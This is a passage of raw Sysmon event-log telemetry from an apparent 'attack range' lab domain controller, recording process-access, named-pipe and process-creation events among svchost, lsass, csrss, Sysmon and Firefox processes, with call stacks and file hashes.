Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=81FFF51AC743CAC51947DE2CF9418DC7,SHA256=A9A9D67897C11DB08BDCEE5D97C3E0A55F17150C887F1E415153030FB8AE94C2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000288130Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.262{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-11AE-6216-1B05-000000003802}5612C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288129Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.262{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-11AE-6216-1B05-000000003802}5612C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x8000000000000000288128Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-ConnectPipe2022-02-23 10:51:26.262{C8EA50B7-11AC-6216-1705-000000003802}5396\chrome.2228.8.184521277C:\Program Files\Mozilla Firefox\firefox.exe 17141700x8000000000000000288127Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-CreatePipe2022-02-23 10:51:26.262{C8EA50B7-11AA-6216-1605-000000003802}2228\chrome.2228.8.184521277C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000288126Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.262{C8EA50B7-11AA-6216-1605-000000003802}22285412C:\Program Files\Mozilla Firefox\firefox.exe{C8EA50B7-11AE-6216-1B05-000000003802}5612C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+19e61d8|C:\Program Files\Mozilla Firefox\xul.dll+19e4a5b|C:\Program Files\Mozilla Firefox\xul.dll+12ac5|C:\Program Files\Mozilla Firefox\xul.dll+9850af|C:\Program Files\Mozilla Firefox\xul.dll+126a7|C:\Program Files\Mozilla Firefox\xul.dll+9822f1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1ddf8|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x8000000000000000288125Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-ConnectPipe2022-02-23 10:51:26.262{C8EA50B7-11AA-6216-1605-000000003802}2228\chrome.2228.7.56076185C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000288124Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.262{C8EA50B7-11AA-6216-1605-000000003802}22282412C:\Program Files\Mozilla Firefox\firefox.exe{C8EA50B7-11AE-6216-1B05-000000003802}5612C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+12204b|C:\Program Files\Mozilla Firefox\xul.dll+1205b3f|C:\Windows\SYSTEM32\ntdll.dll+7f61d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1ddf8|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x8000000000000000288123Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-ConnectPipe2022-02-23 10:51:26.262{C8EA50B7-11AA-6216-1605-000000003802}2228\gecko-crash-server-pipe.2228C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000288122Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.215{C8EA50B7-11AA-6216-1605-000000003802}22286132C:\Program Files\Mozilla Firefox\firefox.exe{C8EA50B7-11AE-6216-1B05-000000003802}5612C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+2bd60|C:\Program Files\Mozilla Firefox\xul.dll+e38a9d|C:\Program Files\Mozilla Firefox\xul.dll+e32cb9|C:\Program Files\Mozilla Firefox\xul.dll+e23ae1|C:\Program Files\Mozilla Firefox\xul.dll+e31d78|C:\Program Files\Mozilla Firefox\xul.dll+7c6644|C:\Program Files\Mozilla Firefox\xul.dll+19c76f6|C:\Program Files\Mozilla Firefox\xul.dll+19c6153|C:\Program Files\Mozilla Firefox\xul.dll+168ec17|C:\Program Files\Mozilla Firefox\xul.dll+19eea33|C:\Program Files\Mozilla Firefox\xul.dll+9850af|C:\Program Files\Mozilla Firefox\xul.dll+249ae|C:\Program Files\Mozilla Firefox\xul.dll+18db08|C:\Program Files\Mozilla Firefox\xul.dll+18ca0f|C:\Program Files\Mozilla Firefox\xul.dll+43f0b91|C:\Program Files\Mozilla Firefox\xul.dll+445b03b|C:\Program Files\Mozilla Firefox\xul.dll+445be29|C:\Program Files\Mozilla Firefox\xul.dll+1f9ac83|C:\Program Files\Mozilla Firefox\firefox.exe+9dd0|C:\Program Files\Mozilla Firefox\firefox.exe+1ca08|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288121Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.215{C8EA50B7-11AA-6216-1605-000000003802}22285412C:\Program Files\Mozilla Firefox\firefox.exe{C8EA50B7-11AE-6216-1B05-000000003802}5612C:\Program Files\Mozilla Firefox\firefox.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+99a30f|C:\Program Files\Mozilla Firefox\xul.dll+7c6644|C:\Program Files\Mozilla Firefox\xul.dll+19e466f|C:\Program Files\Mozilla Firefox\xul.dll+12ac5|C:\Program Files\Mozilla Firefox\xul.dll+9850af|C:\Program Files\Mozilla Firefox\xul.dll+126a7|C:\Program Files\Mozilla Firefox\xul.dll+9822f1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1ddf8|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288120Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.215{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288119Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.215{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288118Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.215{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288117Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.215{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288116Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.215{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-11AE-6216-1B05-000000003802}5612C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000288115Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.215{C8EA50B7-11AA-6216-1605-000000003802}22282268C:\Program Files\Mozilla Firefox\firefox.exe{C8EA50B7-11AE-6216-1B05-000000003802}5612C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\ADVAPI32.dll+189bf|C:\Program Files\Mozilla Firefox\firefox.exe+30cfd|C:\Program Files\Mozilla Firefox\firefox.exe+2ff25|C:\Program Files\Mozilla Firefox\xul.dll+2052e4a|C:\Program Files\Mozilla Firefox\xul.dll+9962fe|C:\Program Files\Mozilla Firefox\xul.dll+9944b5|C:\Program Files\Mozilla Firefox\xul.dll+99b13e|C:\Program Files\Mozilla Firefox\xul.dll+83253d|C:\Program Files\Mozilla Firefox\xul.dll+168dd89|C:\Program Files\Mozilla Firefox\xul.dll+168c88a|C:\Program Files\Mozilla Firefox\xul.dll+9850af|C:\Program Files\Mozilla Firefox\xul.dll+249ae|C:\Program Files\Mozilla Firefox\xul.dll+8357fb|C:\Program Files\Mozilla Firefox\nss3.dll+68dc|C:\Program Files\Mozilla Firefox\nss3.dll+90731|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1ddf8|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000288114Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.221{C8EA50B7-11AE-6216-1B05-000000003802}5612C:\Program Files\Mozilla Firefox\firefox.exe97.0.1FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2228.7.560761857\1839964569" -childID 4 -isForBrowser -prefsHandle 4284 -prefMapHandle 4300 -prefsLen 5798 -prefMapSize 251484 -jsInitHandle 976 -jsInitLen 279340 -parentBuildID 20220216172458 -appDir "C:\Program Files\Mozilla Firefox\browser" - 2228 "\\.\pipe\gecko-crash-server-pipe.2228" 4260 157e9486b48 tabC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32LowMD5=47024075D8FB7B85F0B6615FFB0E87A5,SHA256=FE842C526ABBEE926C9CFE27F45AE3BC20F5614878120A9150B1A2DDA1CD226D,IMPHASH=FAFFE564A2DAFFCCC4A6BE71D34C1748{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 10341000x8000000000000000288113Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.215{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288112Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.215{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288111Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.215{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288110Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.215{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288109Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.215{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288108Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.215{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288107Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.215{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288106Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.215{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288105Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.215{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288104Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.215{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288103Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.215{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla 